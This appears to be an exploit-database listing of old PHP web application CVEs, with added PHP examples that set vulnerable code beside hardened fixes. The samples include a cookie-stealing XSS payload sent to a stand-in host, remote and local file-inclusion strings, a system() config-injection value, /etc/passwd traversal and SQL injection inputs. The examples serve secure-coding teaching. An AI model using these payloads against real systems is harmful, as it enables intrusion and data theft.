Dj7xpl

47 exploits, active since May 2005
CVE-2005-2412 EXPLOITDB html WORKING POC
PHP FirstPost - Remote File Inclusion via Include Parameter
PHP remote file inclusion vulnerability in block.php in PHP FirstPost allows remote attackers to execute arbitrary PHP code via the Include parameter.
CVE-2007-1479 EXPLOITDB text WORKING POC
Creative Guestbook 1.0 - Cross-Site Scripting in Guestbook.php
Cross-site scripting (XSS) vulnerability in Guestbook.php in Creative Guestbook 1.0 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.
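The stored-XSS shape behind a guestbook entry like the one above, as an added PHP example that is not Creative Guestbook's own code (the entry does not name the parameter). The vulnerable renderer is shown beside one that encodes at output time and validates the optional homepage link; field names, the `h()` helper and the storage of entries are assumptions. Needs PHP 7.1 or later.

```php
<?php
// Added example, not code from Creative Guestbook. Field names (name, message,
// homepage) and the entry array layout are assumed.

// Vulnerable: the posted fields are echoed back into HTML as-is, so
// <script>...</script> in the message, or "><img src=x onerror=...> in the name,
// runs in the browser of every later visitor (stored XSS). A homepage of
// javascript:alert(1) becomes a clickable link.
function render_entry_vulnerable(array $entry): string
{
    return '<div class="entry"><b><a href="' . $entry['homepage'] . '">'
        . $entry['name'] . '</a></b>: ' . $entry['message'] . '</div>';
}

// Hardened: keep the raw text in storage, encode for the HTML text/attribute
// context at output, and allow only http(s) URLs in href. Encoding on input
// instead would break other consumers (RSS, e-mail) and invite double encoding.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Returns the URL if it is an absolute http/https URL, otherwise null.
function safe_href(string $url): ?string
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])
        || !in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return $url;
}

function render_entry(array $entry): string
{
    $name = h((string)($entry['name'] ?? ''));
    $href = safe_href((string)($entry['homepage'] ?? ''));
    // Link only when the URL passed validation; h() still encodes quotes in it.
    $who  = $href === null ? $name : '<a href="' . h($href) . '">' . $name . '</a>';
    return '<div class="entry"><b>' . $who . '</b>: '
        . nl2br(h((string)($entry['message'] ?? ''))) . '</div>';
}

// Constructed sample entry, as an attacker would submit it.
$entry = [
    'name'     => '"><img src=x onerror=alert(document.cookie)>',
    'homepage' => 'javascript:alert(1)',
    'message'  => "hi<script>fetch('//evil.example/?c='+document.cookie)</script>",
];
echo render_entry_vulnerable($entry), "\n";
echo render_entry($entry), "\n";
```

The second line of output contains no live tags: angle brackets and quotes are entity-encoded and the javascript: homepage is dropped rather than linked. Context matters; the same `h()` is not sufficient inside a `<script>` block or a CSS value, where a different encoder is required.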
CVE-2008-0245 EXPLOITDB php WORKING POC
UploadImage 1.0 - Unauthenticated Privilege Escalation via Password Change
admin.php in UploadImage 1.0 does not check for the original password before making a change to a new password, which allows remote attackers to gain administrator privileges via the pass parameter in a nopass (Set Password) action.
CVE-2007-2167 EXPLOITDB html WORKING POC
AimStats 3.2 - Remote Code Execution via Number Parameter in Update Action
Static code injection vulnerability in process.php in AimStats 3.2 allows remote attackers to inject PHP code into config.php via the number parameter in an update action.
CVE-2007-2145 EXPLOITDB perl WORKING POC
MiniGal b13 - Remote Code Execution via Image Comments Input Parameter
The imagecomments function in classes.php in MiniGal b13 allows remote attackers to inject arbitrary PHP code into a file in the thumbs/ directory via the input parameter. NOTE: some of these details are obtained from third party information.
CVE-2006-0944 EXPLOITDB text WORKING POC
Archangel Weblog 0.90.02 - Auth Bypass
Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1.
EIP-2026-115998 EXPLOITDB perl WORKING POC
Opera 10.10 - Remote Code Execution Denial of Service
CVE-2007-2157 EXPLOITDB text WORKING POC
Zomplog 3.8 - Directory Traversal via File Parameter
Directory traversal vulnerability in upload/force_download.php in Zomplog 3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
EIP-2026-114509 EXPLOITDB php WORKING POC
YaPiG 0.95b - Remote Code Execution
CVE-2007-1487 EXPLOITDB text WORKING POC
Sascha Schroeder WebLog - Directory Traversal via File Parameter in Showarticles Action
Directory traversal vulnerability in index.php in Sascha Schroeder (aka CyberTeddy or Cyber-inside) WebLog allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a showarticles action.
CVE-2008-0246 EXPLOITDB php WORKING POC
UploadScript 1.0 - Unauthenticated Privilege Escalation via admin.php Pass Parameter
admin.php in UploadScript 1.0 does not check for the original password before making a change to a new password, which allows remote attackers to gain administrator privileges via the pass parameter in a nopass (Set Password) action.
CVE-2007-2715 EXPLOITDB php WORKING POC
Snaps! Gallery 1.4.4 - Unauthenticated Arbitrary Username and Password Change via Admin/users.php
Admin/users.php in Snaps! Gallery 1.4.4 allows remote attackers to change arbitrary usernames and passwords via the (1) username, or the (2) password and password2 parameters in an edit action.
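The "set password without proving you are the admin" handler that the UploadImage, UploadScript and Snaps! Gallery entries describe, and the client-asserted role of the Archangel Weblog ba_admin cookie, as one added PHP example that is not code from any of those projects. The vulnerable handler is shown beside one that requires a server-side admin session, a CSRF token, and the current password. Parameter names (action, pass, nopass) follow the entries; the password file, the hashing, the oldpass/pass2/csrf fields and the session keys are assumptions. Needs PHP 7.1 or later.

```php
<?php
// Added example, not code from UploadImage, UploadScript, Snaps! Gallery or
// Archangel Weblog. Storage layout, field names and session keys are assumed.
session_start();

const PASS_FILE = __DIR__ . '/data/admin.pass';   // assumed: one password hash per line

// Vulnerable shape: anyone who sends action=nopass&pass=x now owns the admin
// account; there is no session check and no current-password check.
// (Hash choice is assumed; the entries only say the old password is not verified.)
function set_password_vulnerable(array $post): void
{
    if (($post['action'] ?? '') === 'nopass') {
        file_put_contents(PASS_FILE, md5((string)($post['pass'] ?? '')));
    }
}

// The Archangel Weblog bypass is the same trust failure one step earlier:
//   if ($_COOKIE['ba_admin'] == 1) { /* treated as admin */ }
// The client asserts its own role. The hardened version below reads the role
// from session state that only the login handler can set.
function is_admin_session(): bool
{
    return !empty($_SESSION['admin_id']);
}

// Returns 'ok' or a short reason string; never changes the password on failure.
function change_password(array $post, string $passFile = PASS_FILE): string
{
    if (!is_admin_session()) {
        return 'not logged in';
    }
    // CSRF token, generated at login with bin2hex(random_bytes(16)) (assumed).
    // hash_equals('', '') is true, so an absent token must be rejected explicitly.
    $tok = (string)($_SESSION['csrf'] ?? '');
    if ($tok === '' || !hash_equals($tok, (string)($post['csrf'] ?? ''))) {
        return 'bad csrf token';
    }
    $old  = (string)($post['oldpass'] ?? '');
    $new  = (string)($post['pass'] ?? '');
    $new2 = (string)($post['pass2'] ?? '');

    $stored = trim((string)@file_get_contents($passFile));
    // This is the check the three entries say is missing.
    if ($stored === '' || !password_verify($old, $stored)) {
        return 'current password wrong';
    }
    if ($new !== $new2 || strlen($new) < 12) {
        return 'new password rejected';
    }
    $hash = password_hash($new, PASSWORD_DEFAULT);
    if (file_put_contents($passFile, $hash . "\n", LOCK_EX) === false) {
        return 'write failed';
    }
    session_regenerate_id(true);          // invalidate any session fixed before the change
    return 'ok';
}

if (($_POST['action'] ?? '') === 'nopass') {
    echo change_password($_POST), "\n";
}
```

A request with only `action=nopass&pass=x`, the shape of the published proofs of concept, now returns 'not logged in'; the same request from a logged-in admin without the token or the current password returns the respective reason and leaves the file untouched.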
CVE-2007-2642 EXPLOITDB text WRITEUP
R2K Gallery 1.7 - Directory Traversal via lang2 Parameter
Directory traversal vulnerability in galeria.php in R2K Gallery 1.7 allows remote attackers to read arbitrary files via a .. (dot dot) in the lang2 parameter.
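The read-arbitrary-files traversal that the Zomplog force_download.php, Sascha Schroeder WebLog and R2K Gallery entries describe, as an added PHP example that is not code from any of those projects. The vulnerable download handler is shown beside one that confines the requested name to a single path component inside the upload directory. The directory name, the `safe_upload_path()` helper and the character allowlist are assumptions. Needs PHP 7.1 or later.

```php
<?php
// Added example, not code from Zomplog or the other listed projects.
// Directory layout and helper names are assumed.

// Vulnerable: the file parameter is appended to a directory and served.
// file=../../config.php (or ../../../../etc/passwd) walks out of upload/.
function download_vulnerable(string $file): void
{
    $path = 'upload/' . $file;
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    readfile($path);
}

// Returns the absolute path to serve, or null if $file is not a plain file name
// that resolves inside $baseDir.
function safe_upload_path(string $file, string $baseDir): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Accept one path component made of safe characters; this rejects '/', '\',
    // NUL and encoded tricks before they reach the filesystem. '.' and '..' are
    // legal by the regex but are directories, so reject them by name.
    if (!preg_match('/\A[A-Za-z0-9._-]+\z/', $file) || $file === '.' || $file === '..') {
        return null;
    }
    // realpath() canonicalises symlinks; confirm the result is still under $base,
    // so a symlink planted in upload/ pointing outside is also refused.
    $path = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function download_hardened(string $file, string $baseDir = __DIR__ . '/upload'): void
{
    $path = safe_upload_path($file, $baseDir);
    if ($path === null || !is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

download_hardened((string)($_GET['file'] ?? ''));
```

The character allowlist does the real work; the realpath() comparison is a second line of defence for symlinks and for future code that relaxes the regex. Using basename() alone, a common "fix" in this era of software, does not help when the parameter is later joined with a directory that is itself attacker-influenced.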
CVE-2007-1937 EXPLOITDB python WORKING POC
Scorp Book 1.0 - Remote File Inclusion via smilies.php config Parameter
PHP remote file inclusion vulnerability in smilies.php in Scorp Book 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the config parameter.
CVE-2007-2050 EXPLOITDB text WRITEUP
RicarGBooK 1.2.1 - Directory Traversal and Arbitrary File Execution via Lang Cookie or Language Parameter
Multiple directory traversal vulnerabilities in header.php in RicarGBooK 1.2.1 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in (1) a lang cookie or (2) the language parameter.
EIP-2026-111563 EXPLOITDB php WORKING POC
psipuss 1.0 - 'editusers.php' Remote Change Admin Password
CVE-2007-1908 EXPLOITDB text WRITEUP
PHP121 Instant Messenger 2.2 - Remote PHP Code Execution via php121dir Parameter
PHP file inclusion vulnerability in php121db.php in PHP121 Instant Messenger 2.2 allows remote attackers to execute arbitrary PHP code via a UNC share pathname or a local file pathname in the php121dir parameter, which is accessed by the file_exists function.
CVE-2007-4934 EXPLOITDB text WORKING POC
phpFFL 1.24 - Remote Code Execution via PHPFFL_FILE_ROOT Parameter
Multiple PHP remote file inclusion vulnerabilities in phpFFL 1.24 allow remote attackers to execute arbitrary PHP code via a URL in the PHPFFL_FILE_ROOT parameter to (1) program_files/livedraft/livedraft.php or (2) program_files/livedraft/admin.php.
CVE-2007-2183 EXPLOITDB text WORKING POC
PHP-Ring Webring System 0.9 - SQL Injection via Ring Parameter
SQL injection vulnerability in index.php in PHP-Ring Webring System (aka uPHP_ring_website) 0.9 allows remote attackers to execute arbitrary SQL commands via the ring parameter.
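The `index.php?ring=...` lookup the entry describes, as an added PHP example that is not PHP-Ring's own code: the concatenated query beside a PDO prepared statement, run against a constructed in-memory SQLite table. Table and column names are assumptions. Needs PHP 7.1 or later with the pdo_sqlite extension.

```php
<?php
// Added example, not code from PHP-Ring Webring System. Schema is assumed.

// Vulnerable: the ring id is pasted into SQL text.
// ring=1 OR 1=1 returns every row; ring=1 UNION SELECT ... turns a lookup into
// a dump of other tables; a stacked or error-based payload depends on the driver.
function find_ring_vulnerable(PDO $db, string $ring): array
{
    $sql = 'SELECT id, name, url FROM rings WHERE id = ' . $ring;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: validate the type you expect, then bind. The value never becomes
// part of the SQL text, so quoting tricks have nothing to act on.
function find_ring(PDO $db, string $ring): array
{
    if (!ctype_digit($ring) || strlen($ring) > 10) {
        return [];                            // ids are small integers; anything else is not a lookup
    }
    $stmt = $db->prepare('SELECT id, name, url FROM rings WHERE id = :id');
    $stmt->bindValue(':id', (int)$ring, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed data for a stand-alone run.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE rings (id INTEGER PRIMARY KEY, name TEXT, url TEXT)');
$db->exec("INSERT INTO rings VALUES (1, 'php', 'http://example.org/ring1'),
                                    (2, 'perl', 'http://example.org/ring2')");

$payload = '1 OR 1=1';
echo 'vulnerable: ', count(find_ring_vulnerable($db, $payload)), " rows\n";
echo 'hardened:   ', count(find_ring($db, $payload)), " rows\n";
echo 'hardened:   ', count(find_ring($db, '1')), " rows\n";
```

With the payload, the vulnerable function returns both rows and the hardened one returns none; a plain `1` returns the single matching ring. The ctype_digit() check is not what prevents injection (the bound parameter does); it exists so that malformed ids fail early and visibly instead of being silently cast to 0.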
CVE-2007-2665 EXPLOITDB html WORKING POC
PhpFirstPost 0.1 - Remote File Inclusion via Include Parameter
PHP remote file inclusion vulnerability in block.php in PhpFirstPost 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the Include parameter.
CVE-2007-1933 EXPLOITDB text WRITEUP
dreamcodes pcp-guestbook 3.0 - Directory Traversal via Lang Parameter
Multiple directory traversal vulnerabilities in PcP-Guestbook (PcP-Book) 3.0 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang parameter to (1) index.php, (2) gb.php, or (3) faq.php.
CVE-2007-2169 EXPLOITDB text WRITEUP
Mozzers SubSystem 1.0 - Code Injection
Static code injection vulnerability in add.php in Mozzers SubSystem 1.0 allows remote attackers to inject PHP code into subs.php via the (1) Sub-name or (2) Sub-url field. NOTE: an earlier report indicated that the add action can be reached through a request to index.php.
CVE-2007-2647 EXPLOITDB php WORKING POC
Monalbum 0.8.7 - Authenticated PHP Code Injection via Admin Configuration Parameters
Static code injection vulnerability in admin/admin_configuration.php in Monalbum 0.8.7 allows remote authenticated users to inject arbitrary PHP code into the conf/config.inc.php file via the (1) gadm_pass, (2) gadm_user, (3) gcfgHote, (4) gcfgPass, (5) gcfgUser, (6) gclassement_rep, (7) gcontour, (8) gfond, (9) ggd_version, (10) ghome, (11) ghor, (12) gimg_copyright, (13) glangage, (14) gmenu_visible, (15) gmini_hasard, (16) gordre_rep, (17) gpage, (18) gracine, (19) grech_inactive, (20) grep_mini, (21) grepertoire, (22) gsite, (23) gslide, (24) gtitre, (25) guse_copyright, (26) gversion, (27) gvert, or (28) gcfgBase parameter.
CVE-2007-2899 EXPLOITDB php WORKING POC
NavBoard 2.6.0 - Remote Code Execution via admin_config.php Parameter Injection
Direct static code injection vulnerability in admin_config.php in NavBoard 2.6.0 allows remote attackers to inject arbitrary PHP code into data/config.php via multiple parameters, as demonstrated via the threadperpage parameter in an editconfig action.
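The "write the setting into config.php as PHP source" pattern shared by the AimStats, MiniGal, Mozzers SubSystem, Monalbum and NavBoard entries, as one added PHP example that is not code from any of those projects. It shows the generator that produces the injectable file, the payload shape that breaks out of the quoted literal, and two safer ways to persist settings. Setting names and the config path are assumptions; threadperpage follows the NavBoard entry. Needs PHP 7.1 or later.

```php
<?php
// Added example, not code from AimStats, MiniGal, Mozzers SubSystem, Monalbum
// or NavBoard. Setting names and the file path are assumed.

// Vulnerable: each value is pasted into PHP source between single quotes.
function build_config_vulnerable(array $settings): string
{
    $out = "<?php\n";
    foreach ($settings as $name => $value) {
        $out .= '$' . $name . " = '" . $value . "';\n";
    }
    return $out;
}
// With threadperpage = 20'; system($_GET['c']); // the generated file reads
//   $threadperpage = '20'; system($_GET['c']); //';
// and runs on the next request that includes data/config.php. The MiniGal and
// AimStats entries are the same sink with a different file name.

// Safer 1: still PHP source, but names come from an allowlist (they become
// variable names) and every value goes through var_export(), which emits a
// correctly escaped literal; numeric settings are coerced instead of quoted.
const ALLOWED_SETTINGS = ['threadperpage', 'sitename', 'admin_email'];

function build_config_hardened(array $settings): string
{
    $out = "<?php\n";
    foreach ($settings as $name => $value) {
        if (!in_array($name, ALLOWED_SETTINGS, true)) {
            continue;                         // unknown key: drop it, never write it
        }
        $value = $name === 'threadperpage' ? max(1, (int)$value) : (string)$value;
        $out .= '$' . $name . ' = ' . var_export($value, true) . ";\n";
    }
    return $out;
}

// Safer 2 (preferred): do not store settings as executable code at all.
function save_config_json(array $settings, string $file): bool
{
    $clean = array_intersect_key($settings, array_flip(ALLOWED_SETTINGS));
    $json  = json_encode($clean, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES);
    return $json !== false && file_put_contents($file, $json, LOCK_EX) !== false;
}

function load_config_json(string $file): array
{
    $data = json_decode((string)@file_get_contents($file), true);
    return is_array($data) ? $data : [];
}

// Constructed input, as an editconfig request would deliver it.
$post = [
    'threadperpage' => "20'; system(\$_GET['c']); //",
    'sitename'      => "Board ' OR 1",
    'evil'          => 'ignored',
];
echo "--- vulnerable ---\n", build_config_vulnerable($post);
echo "--- hardened ---\n",   build_config_hardened($post);
```

In the hardened output threadperpage becomes the integer 20 and sitename becomes a single-quoted literal with the quote escaped, so nothing outside the literal is ever interpreted as code. Even so, a file that is both written by the web server and included by it remains a risk if any other write primitive exists; the JSON variant removes that class of problem entirely.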
CVE-2007-5050 EXPLOITDB text WORKING POC
Neuron News 1.0 - Path Traversal via q Parameter
Directory traversal vulnerability in index.php in Neuron News 1.0 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the q parameter.
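The include-parameter sink behind the remote file inclusion entries (PHP FirstPost, Scorp Book, phpFFL, PhpFirstPost), the UNC/local-path variant in PHP121, and the local inclusion via a lang, language or q parameter (RicarGBooK, PcP-Guestbook, Neuron News), as one added PHP example that is not code from any of those projects. Both vulnerable shapes are shown beside a version that maps the untrusted value onto a fixed set of files. The directory layout, the block and language allowlists and the function names are assumptions; the parameter names follow the entries. Needs PHP 7.1 or later.

```php
<?php
// Added example, not code from any of the listed projects. File layout and
// allowlists are assumed; parameter names follow the entries.

// Vulnerable shape 1: the request names the file to include.
// With allow_url_include on (allow_url_fopen on PHP before 5.2),
// Include=http://attacker.example/shell.txt executes remote code. With it off,
// a local path still works, and on Windows a UNC path such as
// \\attacker\share\x.php is an ordinary filesystem path to include() and to
// file_exists(), which is the PHP121 php121dir technique.
function render_block_vulnerable(array $get): void
{
    include $get['Include'];
}

// Vulnerable shape 2: a prefix and suffix are added, which only looks safer.
// lang=../../../../etc/passwd%00 walks out of lang/ and, on PHP before 5.3.4,
// the NUL byte truncates the '.php' suffix; a traversal into an uploaded
// image or log file containing <?php ... ?> gives code execution without RFI.
function load_language_vulnerable(array $get, array $cookie): void
{
    $lang = $cookie['lang'] ?? $get['language'] ?? 'en';
    include 'lang/' . $lang . '.php';
}

// Hardened shape: the untrusted value selects from a fixed map; the raw string
// is never passed to include().
const BLOCKS = ['news' => 'blocks/news.php', 'login' => 'blocks/login.php'];
const LANGS  = ['en', 'de', 'fr'];

function resolve_block(string $name): ?string
{
    return BLOCKS[$name] ?? null;             // unknown name: no include at all
}

function resolve_language(string $lang, string $langDir = __DIR__ . '/lang'): ?string
{
    if (!in_array($lang, LANGS, true)) {
        return null;
    }
    // Belt and braces: even an allowlisted name must resolve inside $langDir.
    $base = realpath($langDir);
    $path = realpath($langDir . '/' . $lang . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function render_block_hardened(array $get): void
{
    $file = resolve_block((string)($get['Include'] ?? ''));
    if ($file === null) {
        http_response_code(404);
        return;
    }
    include $file;
}

function load_language_hardened(array $get, array $cookie): void
{
    $file = resolve_language((string)($cookie['lang'] ?? $get['language'] ?? 'en'));
    include $file ?? __DIR__ . '/lang/en.php';   // fall back to the default language
}

render_block_hardened($_GET);
load_language_hardened($_GET, $_COOKIE);
```

Disabling allow_url_include in php.ini (and allow_url_fopen where remote opens are not needed) removes the remote case for every script on the host and is worth doing regardless; it does nothing for the local traversal case, which only the allowlist fixes.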